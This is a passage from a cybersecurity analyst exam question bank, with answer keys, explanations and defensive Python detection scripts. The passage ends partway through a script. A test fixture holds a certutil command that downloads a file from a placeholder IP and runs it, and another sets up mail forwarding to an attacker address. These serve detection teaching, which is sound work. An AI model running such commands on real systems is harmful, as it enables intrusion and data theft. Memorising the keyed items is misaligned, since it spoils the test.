
359
MCQmedium

Refer to the exhibit. An analyst sees this output from a workstation. Which of the following is the most likely explanation?

A.The workstation is receiving NTP time synchronization
B.The workstation is performing a port scan
C.The workstation is a web server
D.The workstation is infected with malware connecting to a C2 server
AnswerD

Repeated outbound connections from changing ephemeral source ports to a single external IP and port form a beaconing pattern and are suspicious.

Why this answer

The output shows repeated outbound TCP connections to a single external IP address on port 443 (HTTPS) with varying source ports, which is characteristic of beaconing behavior. Malware often establishes periodic connections to a command-and-control (C2) server to receive instructions or exfiltrate data, and the pattern of multiple connections from different ephemeral ports to the same destination is a common indicator of such activity.

Exam trap

The trap here is that candidates see HTTPS (port 443) and assume legitimate web server or normal browsing, missing the key indicator of repeated outbound connections to a single external IP, which is a hallmark of C2 beaconing rather than typical client-server communication.

How to eliminate wrong answers

Option A is wrong because NTP time synchronization uses UDP port 123, not TCP port 443, and the output shows TCP connections, not NTP packets. Option B is wrong because a port scan typically involves connections to multiple destination ports on a target, not repeated connections to a single destination port from varying source ports. Option C is wrong because a web server listens on TCP port 80 or 443 for inbound connections, whereas this output shows outbound connections from the workstation to an external IP, indicating client-side behavior.
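As an added illustration (not part of the original question bank), the following Python script applies the reasoning above to a connection table: it parses a constructed netstat-style listing, groups connections by remote IP, and separates the beaconing pattern (many connections, one destination port, a different source port each time, external address) from a port scan (one target, many destination ports). The sample listings, the address 203.0.113.45, and the count threshold are assumptions made for the example.

```python
"""Spot C2-style beaconing versus port scanning in a host's connection table.

Added example, not part of the original question bank. SAMPLE_BEACON and
SAMPLE_SCAN are constructed netstat-style listings; the thresholds in
classify() are assumptions chosen for illustration, not vendor defaults.
"""
import ipaddress
from collections import defaultdict

# Constructed: a workstation with repeated outbound connections to one
# external IP on tcp/443 from a different ephemeral source port each time.
SAMPLE_BEACON = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.5.23:49712        203.0.113.45:443       ESTABLISHED     4120
  TCP    10.0.5.23:49733        203.0.113.45:443       TIME_WAIT       0
  TCP    10.0.5.23:49761        203.0.113.45:443       ESTABLISHED     4120
  TCP    10.0.5.23:49790        203.0.113.45:443       TIME_WAIT       0
  TCP    10.0.5.23:49815        203.0.113.45:443       ESTABLISHED     4120
  TCP    10.0.5.23:50102        10.0.5.10:445          ESTABLISHED     4
  UDP    10.0.5.23:123          *:*                                    1032
"""

# Constructed: the same host probing one internal target on many ports.
SAMPLE_SCAN = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.5.23:51001        10.0.8.7:22            SYN_SENT        6644
  TCP    10.0.5.23:51002        10.0.8.7:23            SYN_SENT        6644
  TCP    10.0.5.23:51003        10.0.8.7:80            SYN_SENT        6644
  TCP    10.0.5.23:51004        10.0.8.7:443           SYN_SENT        6644
  TCP    10.0.5.23:51005        10.0.8.7:3389          SYN_SENT        6644
  TCP    10.0.5.23:51006        10.0.8.7:8080          SYN_SENT        6644
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """RFC 1918 check only. 203.0.113.0/24 (TEST-NET-3) stands in for a public
    address here, so ipaddress.is_private is deliberately not used: it would
    classify the documentation ranges as private."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_netstat(text):
    """Return (local_port, remote_ip, remote_port, state) for each TCP row.
    The header row and UDP rows (no state column) are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "TCP":
            continue
        _, local_port = parts[1].rsplit(":", 1)
        remote_ip, remote_port = parts[2].rsplit(":", 1)
        if not remote_port.isdigit():
            continue
        rows.append((int(local_port), remote_ip, int(remote_port), parts[3]))
    return rows


def classify(rows, min_conns=4):
    """Map each remote IP to a verdict using two heuristics (assumptions):
    - "port scan": >= min_conns connections to ONE remote IP spread over at
      least min_conns distinct destination ports;
    - "possible C2 beaconing": >= min_conns connections to ONE remote IP and
      ONE destination port, each from a different source port, where the
      remote address is outside RFC 1918 space.
    Anything else is "no pattern". A web server would show the reverse
    (many remote IPs hitting the local 80/443), which this does not flag."""
    by_remote = defaultdict(list)
    for local_port, remote_ip, remote_port, _state in rows:
        by_remote[remote_ip].append((local_port, remote_port))
    verdicts = {}
    for remote_ip, pairs in by_remote.items():
        src_ports = {lp for lp, _ in pairs}
        dst_ports = {rp for _, rp in pairs}
        if len(pairs) >= min_conns and len(dst_ports) >= min_conns:
            verdicts[remote_ip] = "port scan"
        elif (len(pairs) >= min_conns and len(dst_ports) == 1
              and len(src_ports) == len(pairs) and not is_internal(remote_ip)):
            verdicts[remote_ip] = "possible C2 beaconing on tcp/%d" % next(iter(dst_ports))
        else:
            verdicts[remote_ip] = "no pattern"
    return verdicts


def triage(text):
    """Parse a netstat listing and return {remote_ip: verdict}."""
    return classify(parse_netstat(text))


if __name__ == "__main__":
    for name, sample in (("beacon", SAMPLE_BEACON), ("scan", SAMPLE_SCAN)):
        for ip, verdict in triage(sample).items():
            print(f"{name}: {ip} -> {verdict}")
```

The SMB connection to 10.0.5.10 and the UDP/123 row fall through as "no pattern", which is the point of the NTP distractor in the question: a single connection, or UDP with no state, is not what the beaconing heuristic keys on. In production the same grouping would be run over repeated snapshots so that the interval between connections (the beacon period) can be measured as well.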

360
Multi-Selecthard

A security analyst is prioritizing vulnerabilities for remediation. The analyst has the following information: a vulnerability with a CVSS score of 9.0 that affects a public-facing web server, and a vulnerability with a CVSS score of 7.5 that affects an internal database server with sensitive data. Which two factors should the analyst consider when prioritizing? (Choose two.)

Select 2 answers
A.The presence of known exploits in the wild.
B.The vendor's patch release date.
C.The asset's exposure and criticality.
D.The number of open ports on each server.
E.The vulnerability publication date.
AnswersA, C

Active exploits increase urgency.

Why this answer

Option A is correct because the presence of known exploits in the wild directly impacts the likelihood of a vulnerability being weaponized. Even a high CVSS score (e.g., 9.0) may be less urgent if no exploit exists, while a lower-scored vulnerability (e.g., 7.5) with active exploitation poses an immediate threat. In CVSS terms this is the Exploit Code Maturity metric (temporal group in v3.x, threat group in v4.0), and in practice it is why sources such as CISA's Known Exploited Vulnerabilities catalog are fed into prioritization. Option C is correct because exposure and criticality determine impact: the public-facing web server is reachable by any attacker, while the internal database holds sensitive data, so each asset's context changes the real-world severity of its vulnerability beyond what the base score says.

Exam trap

CompTIA often tests the misconception that the CVSS base score alone determines priority, whereas the correct approach combines CVSS with threat intelligence (exploit availability) and asset criticality and exposure.

361
MCQmedium

During a security incident, the SOC analyst determines that the attack is originating from an internal IP address belonging to the finance department. The incident response plan requires escalation to the appropriate team. Which of the following should the analyst contact first?

A.The legal department to handle potential compliance issues.
B.The system administrator for the finance department to isolate the host.
C.The finance department manager to confirm if the activity is authorized.
D.The human resources department for disciplinary action.
AnswerC

Verifying with the department manager confirms if the activity is legitimate before further action.

Why this answer

Option C is correct because the scenario's incident response plan calls for confirming whether the activity is authorized before containment actions are taken. Since the traffic originates from an internal finance-department IP, the analyst first contacts the finance department manager to verify whether it is legitimate business use (e.g., a scheduled audit or an approved data transfer). This prevents unnecessary disruption and matches the detection and analysis phase of NIST SP 800-61, in which an event is validated as an incident before containment begins.

Exam trap

CompTIA often tests the misconception that technical containment (e.g., isolating a host) should be the immediate next step, but the correct sequence requires verifying authorization first to avoid disrupting legitimate business operations.

How to eliminate wrong answers

Option A is wrong because legal involvement is premature at this stage; compliance questions arise once unauthorized activity is confirmed, not before authorization has been checked. Option B is wrong because isolating the host before confirming whether the activity is authorized could disrupt legitimate business operations; in this plan the system administrator is engaged once the manager denies that the activity was approved. Option D is wrong because HR disciplinary action is a post-incident step, relevant only after unauthorized activity is confirmed and attributed to an individual, not during initial triage.

362
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Reinstall the browser used by the user
B.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
C.Ignore it because certutil is signed by Microsoft
D.Only check whether antivirus signatures are current
AnswerB

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option B is correct because certutil.exe is a known living-off-the-land binary (LOLBin) that attackers abuse to download payloads from external URLs, bypassing application whitelisting. The root-cause analysis must focus on the downloaded file's hash (to identify malware), its origin (the external URL), and any child processes spawned (to trace execution chain), as these directly explain the malicious activity.

Exam trap

CompTIA often tests the misconception that signed Microsoft binaries are inherently safe, tricking candidates into ignoring LOLBin abuse, when the real focus should be on the downloaded file's hash, origin, and execution chain.

How to eliminate wrong answers

Option A is wrong because reinstalling the browser does not address the root cause; the attack used certutil.exe, not the browser, so the browser is irrelevant to the download or execution. Option C is wrong because ignoring the alert due to certutil being signed by Microsoft is a dangerous misconception; attackers exploit legitimate signed binaries (LOLBins) to evade detection, and the activity is clearly anomalous and requires investigation. Option D is wrong because checking antivirus signature currency does not explain the activity; the payload may be new or packed, and the certutil download-and-execute chain is already visible in the telemetry regardless of signature status.

363
Multi-Selectmedium

Which items belong in a vulnerability exception request? (Choose three.)

Select 3 answers
A.Business justification for delayed remediation
B.A request to remove the asset from inventory
C.Expiration or review date
D.Compensating controls
AnswersA, C, D

Justification explains why normal remediation cannot occur.

Why this answer

A vulnerability exception request is a formal process to accept the risk of not remediating a vulnerability within the standard timeframe. A business justification for delayed remediation is a core component because it documents the operational, financial, or technical reasons why the fix cannot be applied immediately, which is required for risk acceptance by management. Without this justification, the exception lacks the necessary context for approval and audit compliance. An expiration or review date keeps the exception temporary and forces re-evaluation rather than indefinite acceptance, and compensating controls describe what reduces the exposure while the vulnerability remains open.

Exam trap

CompTIA often tests the distinction between operational risk acceptance (exception request) and asset lifecycle management (decommissioning), leading candidates to incorrectly include asset removal as part of the exception process.

364
MCQeasy

A security analyst reviews the above bucket policy. Which of the following BEST describes the risk associated with this policy?

A.The bucket is publicly readable, potentially exposing sensitive data
B.The bucket allows anyone to upload malicious files
C.The bucket enforces encryption in transit
D.The bucket requires authentication for access
AnswerA

Principal: * allows unauthenticated access.

Why this answer

Option A is correct because the Principal is "*", so any unauthenticated party can call s3:GetObject on every object in the bucket, which is exactly a public-read exposure.

How to eliminate wrong answers

Option B is wrong because the statement grants only s3:GetObject (a read), not s3:PutObject, so it does not let anyone upload files. Option C is wrong because nothing in the policy addresses encryption in transit; enforcing it would need a Deny condition on aws:SecureTransport, which is absent. Option D is wrong because a wildcard principal is the opposite of requiring authentication; anonymous requests are allowed.
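The bucket policy exhibit is not reproduced on this page, so the following added example (not from the question bank) constructs a policy with the properties the explanation describes and checks it the way an analyst would: does any Allow statement name an anonymous principal, and which read or write actions does it grant? The bucket name, account ID, and role name in both policies are invented; the hardened policy shows what a corrected grant to a single IAM role looks like.

```python
"""Flag anonymous-principal grants in an S3 bucket policy.

Added example, not from the original question bank. OPEN_POLICY is
constructed to match the page's description (Version 2012-10-17,
Principal "*", s3:GetObject). HARDENED_POLICY, the account ID and the role
name are likewise invented to show a corrected grant.
"""
import fnmatch
import json

OPEN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-customer-exports/*",
    }],
})

HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ExportReaderOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/ExportReader"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-customer-exports",
                     "arn:aws:s3:::example-customer-exports/*"],
    }],
})

READ_ACTIONS = ("s3:GetObject", "s3:ListBucket")
WRITE_ACTIONS = ("s3:PutObject", "s3:DeleteObject", "s3:PutBucketPolicy")


def as_list(value):
    """IAM allows scalars or lists for Action, Resource, Statement and AWS."""
    return value if isinstance(value, list) else [value]


def is_anonymous(principal):
    """IAM treats Principal "*" and Principal {"AWS": "*"} as everyone,
    including unauthenticated requests."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in as_list(principal.get("AWS", []))
    return False


def grants(action_patterns, action):
    """Does any pattern ("s3:GetObject", "s3:Get*", "s3:*", "*") cover action?"""
    return any(fnmatch.fnmatchcase(action, p) for p in action_patterns)


def assess_bucket_policy(policy_json):
    """Return findings for Allow statements with an anonymous principal.
    A Condition (e.g. aws:SourceVpce, aws:SourceIp) narrows the grant and is
    reported as 'conditional' so a reviewer still looks at it. Deny statements
    are not evaluated here; a real policy simulator would apply them."""
    policy = json.loads(policy_json)
    findings = []
    for st in as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not is_anonymous(st.get("Principal")):
            continue
        patterns = as_list(st.get("Action", []))
        scope = "conditional" if st.get("Condition") else "unconditional"
        for label, actions in (("public read", READ_ACTIONS), ("public write", WRITE_ACTIONS)):
            hit = [a for a in actions if grants(patterns, a)]
            if hit:
                findings.append({"sid": st.get("Sid"), "finding": label,
                                 "scope": scope, "actions": hit,
                                 "resource": as_list(st.get("Resource", []))})
    return findings


if __name__ == "__main__":
    print("open:", assess_bucket_policy(OPEN_POLICY))
    print("hardened:", assess_bucket_policy(HARDENED_POLICY))
```

The check deliberately keys on the principal first and the action second, mirroring the page's point that the wildcard principal is the misconfiguration and the action scope only changes how bad it is: the same function reports both "public read" and "public write" for a statement that pairs `Principal: {"AWS": "*"}` with `s3:*`.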

365
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Sign-in logs, MFA result, device details, and mailbox audit events
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Only DHCP logs from the London office
AnswerA

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option A is correct because the UEBA rule indicates a possible account compromise (impossible travel followed by mailbox rule creation). The analyst must first verify the sign-in logs for authentication source IPs, MFA result to check if the attacker bypassed MFA, device details to identify if a known device was used, and mailbox audit events to confirm the forwarding rule. These four data sources provide the minimum evidence needed to assess the scope of compromise before containment.

Exam trap

CompTIA often tests the candidate's ability to prioritize server-side identity and mailbox records (sign-in logs, MFA results, audit events) over client-side artifacts (browser cache) or unrelated infrastructure (the public DNS zone file) when investigating a UEBA alert for account compromise.

How to eliminate wrong answers

Option B is wrong because the organisation's public DNS zone file is irrelevant to a user-level authentication and mailbox rule anomaly; DNS records do not contain user sign-in or mailbox audit data. Option C is wrong because the user's browser cache is a client-side artifact that may be overwritten or inaccessible, and it does not provide server-side evidence of authentication events or mailbox rule creation, which are critical for forensic analysis. Option D is wrong because DHCP logs from the London office could at most tie the London sign-in to a local device; they say nothing about the Singapore session, the MFA outcome, or the mailbox rule.
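The following Python script is an added example (not part of the question bank) of what "investigate first" looks like in data: it recomputes the impossible-travel condition from two sign-ins (great-circle distance over elapsed time), then assembles the four items the answer names, source IPs, MFA results, device details, and the mailbox audit events that created forwarding shortly after the suspect sign-in. The sign-in and audit records are constructed to resemble Entra ID sign-in logs and Exchange mailbox audit events; the user, IP addresses, device names, timestamps, and forwarding address are invented, the city coordinates are real, and the 1000 km/h speed threshold and two-hour window are assumptions.

```python
"""Turn the UEBA alert into a first-pass investigation package.

Added example, not from the original question bank. SIGNINS and MAILBOX_AUDIT
are constructed records shaped loosely like Entra ID sign-in logs and Exchange
mailbox audit events; the user, IPs, device names, timestamps and the
forwarding address are invented. Coordinates are the cities' real locations.
"""
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

SIGNINS = [  # constructed
    {"user": "a.lee@example.com", "time": "2024-03-04T08:00:00+00:00", "ip": "198.51.100.23",
     "city": "London", "lat": 51.5074, "lon": -0.1278, "mfa": "satisfied",
     "device": "LT-ALEE-01 (compliant, managed)"},
    {"user": "a.lee@example.com", "time": "2024-03-04T09:00:00+00:00", "ip": "198.51.100.23",
     "city": "London", "lat": 51.5074, "lon": -0.1278, "mfa": "satisfied",
     "device": "LT-ALEE-01 (compliant, managed)"},
    {"user": "a.lee@example.com", "time": "2024-03-04T09:12:00+00:00", "ip": "203.0.113.77",
     "city": "Singapore", "lat": 1.3521, "lon": 103.8198, "mfa": "not performed",
     "device": "unknown browser, unmanaged"},
]

MAILBOX_AUDIT = [  # constructed
    {"user": "a.lee@example.com", "time": "2024-03-04T09:20:00+00:00", "ip": "203.0.113.77",
     "operation": "New-InboxRule",
     "params": {"Name": ".", "ForwardTo": "attacker-drop@example.net", "DeleteMessage": True}},
    {"user": "a.lee@example.com", "time": "2024-03-04T10:05:00+00:00", "ip": "198.51.100.23",
     "operation": "MailItemsAccessed", "params": {}},
]

# Exchange cmdlets and parameters that create mail forwarding.
FORWARDING_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}
FORWARDING_KEYS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "ForwardingSmtpAddress"}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance on a 6371 km sphere."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlam = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def _t(record):
    return datetime.fromisoformat(record["time"])


def impossible_travel(signins, max_kmh=1000.0, min_km=100.0):
    """Flag consecutive sign-ins per user whose implied speed exceeds max_kmh.
    min_km suppresses geo-IP jitter between nearby locations (assumption)."""
    flags = []
    by_user = {}
    for s in sorted(signins, key=_t):
        by_user.setdefault(s["user"], []).append(s)
    for user, events in by_user.items():
        for prev, cur in zip(events, events[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km < min_km:
                continue
            hours = (_t(cur) - _t(prev)).total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                flags.append({"user": user, "from": prev, "to": cur,
                              "distance_km": round(km), "speed_kmh": round(speed)})
    return flags


def build_investigation(signins, mailbox_audit, window=timedelta(hours=2)):
    """For each impossible-travel flag, collect the four things the analyst
    checks first: both sign-ins (source IPs), MFA results, device details, and
    mailbox audit events that created forwarding within the window."""
    packages = []
    for flag in impossible_travel(signins):
        start, end = _t(flag["to"]), _t(flag["to"]) + window
        forwarding = [
            e for e in mailbox_audit
            if e["user"] == flag["user"] and start <= _t(e) <= end
            and e["operation"] in FORWARDING_OPERATIONS
            and FORWARDING_KEYS & set(e["params"])
        ]
        packages.append({
            "user": flag["user"],
            "speed_kmh": flag["speed_kmh"],
            "source_ips": [flag["from"]["ip"], flag["to"]["ip"]],
            "mfa_results": [flag["from"]["mfa"], flag["to"]["mfa"]],
            "devices": [flag["from"]["device"], flag["to"]["device"]],
            "forwarding_events": forwarding,
            "rule_created_from_suspect_ip": any(e["ip"] == flag["to"]["ip"] for e in forwarding),
        })
    return packages


if __name__ == "__main__":
    for pkg in build_investigation(SIGNINS, MAILBOX_AUDIT):
        print(pkg)
```

The London-to-London pair at 08:00 and 09:00 is dropped by the distance floor, the London-to-Singapore pair implies roughly 54,000 km/h, and the forwarding rule is created eight minutes later from the same Singapore IP with no MFA on that session. That combination is the evidence the answer asks for before any containment step such as revoking sessions or removing the rule, and it is all server-side, so none of it depends on the user's workstation.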

366
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A.Only physical datacenter access logs
B.Only user password age reports
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O, or a syscall-level tool such as Falco) capture process spawns such as a shell inside the container and the mount calls that attach the host filesystem; Kubernetes audit logs record the API calls that created or changed the pod, including a spec that allowed a `hostPath` volume or privileged mode, which explains how the mount became possible; and network flow logs (e.g., from the CNI plugin or an eBPF-based sensor) show the outbound connections to the unknown IP. Together these three sources cover the whole sequence (execution, privilege context, and external communication), making option C the most useful. For the tuning part of the question, the same sources let the rule allow-list expected shells (for example a debug sidecar) and known egress destinations per namespace, so it fires only on the deviation rather than on every exec.

Exam trap

CompTIA often tests the misconception that unrelated administrative records (physical access logs, password reports, scan summaries) can substitute for workload telemetry, when in fact container-specific runtime, orchestration, and network data are required to detect anomalies like shell execution and unauthorized mounts.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs track who entered the facility, not container-level activities like shell execution or network flows; they are irrelevant to a workload compromise. Option B is wrong because user password age reports indicate password policy compliance, not real-time runtime behavior; they cannot detect a shell spawning or outbound connections from a container.

367
MCQmedium

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For validation, which action should be taken before closing or downgrading the finding?

A.Give all users local admin rights
B.Mark the vulnerability as fixed
C.Documented risk acceptance with compensating controls and a migration/remediation plan
D.Remove the system from future reports
AnswerC

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched because the vendor no longer supports it, the vulnerability manager should request formal, documented risk acceptance by the system owner, implementation of compensating controls (e.g., network segmentation, host-based firewall rules, or application allow-listing), and a migration or remediation plan with a date by which the system is retired or replaced. This is the risk-acceptance path of the NIST Risk Management Framework (SP 800-37) and keeps the decision auditable; before the finding is downgraded, the compensating controls should be verified to be in place and effective.

Exam trap

CompTIA often tests the misconception that 'no patch available' means the vulnerability can be closed as 'fixed' or that compensating controls alone are sufficient without formal documentation and a plan.

How to eliminate wrong answers

Option A is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly violating the principle of least privilege and potentially making the system more vulnerable. Option B is wrong because marking the vulnerability as fixed when no patch has been applied is a false closure; vulnerabilities must be remediated, mitigated, or formally accepted, not simply closed without evidence. Option D is wrong because removing the system from future reports hides the risk instead of managing it; the finding must stay visible to the exception owner and to whoever reviews the exception at its expiry.

368
Multi-Selectmedium

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Select 2 answers
A.Suppress alerts only with documented criteria and expiry
B.Delete noisy detections permanently without review
C.Route every alert directly to executives
D.Add enrichment such as asset criticality and threat-intel context
AnswersA, D

Time-bound suppression preserves governance.

Why this answer

Option A is correct because suppressing alerts based on documented criteria (e.g., known false-positive signatures, scheduled maintenance windows) with an expiry date ensures that the suppression is temporary and reviewed periodically. This reduces alert fatigue while maintaining visibility into potential threats, as expired suppressions automatically re-enable alerting. Without an expiry, a suppression could inadvertently hide malicious activity that later matches the same criteria. Option D is correct because enrichment with asset criticality and threat-intelligence context lets the same alert be ranked differently on a domain controller than on a test VM and lets the analyst dismiss or escalate quickly; it reduces the time spent per alert without dropping any detection.

Exam trap

CompTIA often tests the misconception that permanently deleting noisy detections is acceptable; the trap is that deletion removes coverage for future variations of the same threat, whereas tuning, enrichment, and time-bound suppression keep the detection while cutting the noise.

369
MCQmedium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
B.A vulnerability scanner run once per quarter
C.Host-based file integrity monitoring only
D.Inline IPS mode with drop rules for all signatures
AnswerA

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is correct because it passively inspects packet payloads against signatures without affecting traffic flow, meeting the requirement to detect exploit traffic and generate alerts without blocking. IDS mode ensures no inline packet drops, while a tap or SPAN port provides full packet visibility for signature matching.

Exam trap

CompTIA often tests the distinction between IDS and IPS modes, where candidates mistakenly choose inline IPS (Option D) because they think blocking is required for security, but the question explicitly states 'without blocking traffic,' making passive IDS the correct choice.

How to eliminate wrong answers

Option B is wrong because a vulnerability scanner run once per quarter is a proactive assessment tool that does not provide real-time packet payload inspection or alert generation for exploit traffic. Option C is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-based exploit traffic in packet payloads. Option D is wrong because inline IPS mode with drop rules for all signatures actively blocks traffic, which violates the requirement to generate alerts without blocking traffic.

370
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For business prioritization, which recommendation gives the best risk-based order of work?

A.Delete all audit logs to reduce liability
B.Wait for the next quarterly review
C.Restrict public access and determine whether sensitive data was accessed
D.Rotate database administrator passwords only
AnswerC

The priority is exposure containment and impact assessment.

Why this answer

Option C is correct because the immediate priority is to contain the exposure by restricting public access to the storage bucket (for example with the provider's block-public-access control or by removing the anonymous grant), then to determine from access logs whether the customer exports were actually read by unauthorized parties. That is the incident-handling order of contain first, then assess impact, and it addresses the data exposure without waiting for a scheduled review or performing unrelated actions.

Exam trap

The trap here is that candidates may choose to rotate passwords (Option D) as a generic security response, but the question specifically tests the ability to prioritize containment of the exposed resource over unrelated credential changes.

How to eliminate wrong answers

Option A is wrong because deleting audit logs destroys forensic evidence needed to determine the scope of the breach and violates compliance requirements (e.g., GDPR, PCI DSS) that mandate retention of logs for incident investigation. Option B is wrong because waiting for the next quarterly review leaves the bucket publicly accessible, allowing continued unauthorized access and potential data exfiltration, which is unacceptable for a critical finding. Option D is wrong because rotating database administrator passwords does not address the storage bucket's public read access; it is an unrelated control that does not mitigate the immediate exposure of customer exports.

371
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Ignore it because certutil is signed by Microsoft
B.Reinstall the browser used by the user
C.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
D.Only check whether antivirus signatures are current
AnswerC

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option C is correct because certutil.exe is a known living-off-the-land binary (LOLBin) that attackers abuse to download payloads with a signed, allow-listed Microsoft tool. The analyst must focus on the downloaded file's hash (for threat-intelligence lookups), its origin URL (to identify the hosting or C2 infrastructure), and any child processes spawned (to trace the execution chain). In the containment trade-off phase, preserving these artifacts and the host's volatile state is critical for forensic analysis while the host is isolated from the network.

Exam trap

CompTIA often tests the misconception that signed Microsoft binaries are inherently safe; the trap here is that certutil.exe is a dual-use tool, legitimate for administrators but weaponized by attackers as a LOLBin.

How to eliminate wrong answers

Option A is wrong because certutil being signed by Microsoft does not make its use safe; attackers abuse its legitimate functionality (e.g., -urlcache -split -f) to download malicious files, a classic LOLBin technique. Option B is wrong because reinstalling the browser does not address the root cause, the misuse of a system binary, and may destroy evidence of the download and execution chain. Option D is wrong because antivirus signatures are reactive and may miss fileless or obfuscated payloads; the analyst must investigate the downloaded file's hash and behavior, not just signature currency.
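Questions 362 and 371 both ask for the same three artifacts (hash, origin, child process) around a certutil download. The following Python script is an added example (not from the question bank) of extracting them from process-creation telemetry: it recognises certutil's `-urlcache ... -f <URL> <OutFile>` form, then links the dropped file to a later process-creation event whose image is that file in a user-writable directory. The event records are constructed in the shape of Sysmon Event ID 1 (process create); the paths, PIDs, user, URL, and hash values are invented, and the "user-writable" test is a path-prefix assumption rather than an ACL check.

```python
"""Tie a certutil.exe download to the later execution of the dropped file.

Added example, not from the original question bank. EVENTS is a constructed
list of Sysmon-style process-creation records (field names follow Sysmon
Event ID 1; the paths, PIDs, URL, user and hash values are invented). A real
pipeline would read these from the SIEM or EDR instead.
"""
import re

USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

EVENTS = [
    {"pid": 4420, "ppid": 1180, "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe",
     "hashes": "SHA256=" + "c3" * 32},
    {"pid": 5112, "ppid": 4420, "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/update.bin C:\Users\jdoe\AppData\Local\Temp\update.bin",
     "hashes": "SHA256=" + "b2" * 32},
    {"pid": 5300, "ppid": 4420, "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\update.bin",
     "cmdline": r"C:\Users\jdoe\AppData\Local\Temp\update.bin",
     "hashes": "SHA256=" + "a1" * 32},
    # Benign use of the same binary by an administrator: not a download.
    {"pid": 5400, "ppid": 2200, "user": "CORP\\admin",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256",
     "hashes": "SHA256=" + "b2" * 32},
    # A second fetch whose output file is never executed.
    {"pid": 5500, "ppid": 4420, "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f https://198.51.100.7/tool.dat C:\ProgramData\tool.dat",
     "hashes": "SHA256=" + "b2" * 32},
]


def parse_certutil_download(cmdline):
    """Return (url, out_path) when cmdline is certutil's fetch form,
    `certutil -urlcache [-split] -f <URL> [<OutFile>]`, otherwise None.
    out_path is None when no output file was given (cache-only fetch)."""
    tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if exe not in ("certutil", "certutil.exe"):
        return None
    flags = {t.lower().lstrip("-/") for t in tokens[1:] if t[0] in "-/"}
    if "urlcache" not in flags:
        return None
    url = next((t for t in tokens[1:] if re.match(r"https?://", t, re.I)), None)
    if url is None:
        return None
    last = tokens[-1]
    out_path = last if last != url and last[0] not in "-/" else None
    return url, out_path


def is_user_writable(path):
    """Assumption: paths under Users, ProgramData, Temp or AppData are writable
    by a standard user. Production code should check the actual ACL."""
    p = path.lower()
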